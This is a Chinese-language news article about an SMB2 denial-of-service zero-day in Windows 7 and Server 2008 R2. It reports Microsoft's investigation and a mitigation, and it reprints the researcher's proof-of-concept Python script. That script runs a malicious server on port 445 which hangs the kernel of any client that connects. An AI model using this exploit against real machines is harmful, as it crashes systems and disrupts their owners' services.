Win7再曝零日漏洞 微軟稱正在調查(附測試代碼)
微軟昨日證實,有報告指出Windows 7和Windows Server 2008 R2中存在一個漏洞,可被用來進行遠程攻擊系統,并導致系統內核崩潰,微軟目前正在就此問題進行調查。
微軟官方發言人表示,此漏洞為Windows網絡文件和打印共享協議Server Message Block(SMB)中存在的拒絕式服務漏洞,不過迄今為止微軟還沒有發現利用此漏洞實施攻擊行為的案例。
安全專家Laurent Gaffie昨日在博客中曝光了這一漏洞,并將其定級為中高級別漏洞,Laurent Gaffie表示這個漏洞會導致SMB協議進入無限死循環,他還進行了完整代碼演示。目前還沒有任何修復該漏洞的補丁,Gaffie建議用戶在微軟發布相關補丁前關閉SMB功能和端口。
Gaffie指出,無論你的防火墻是如何設置的,黑客都有可能在局域網內或是利用IE對你的系統進行攻擊。Gaffie表示,該漏洞僅影響Windows 7和Windows Server 2008 R2,并不對其它系統造成影響。
附代碼演示:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
【編輯推薦】
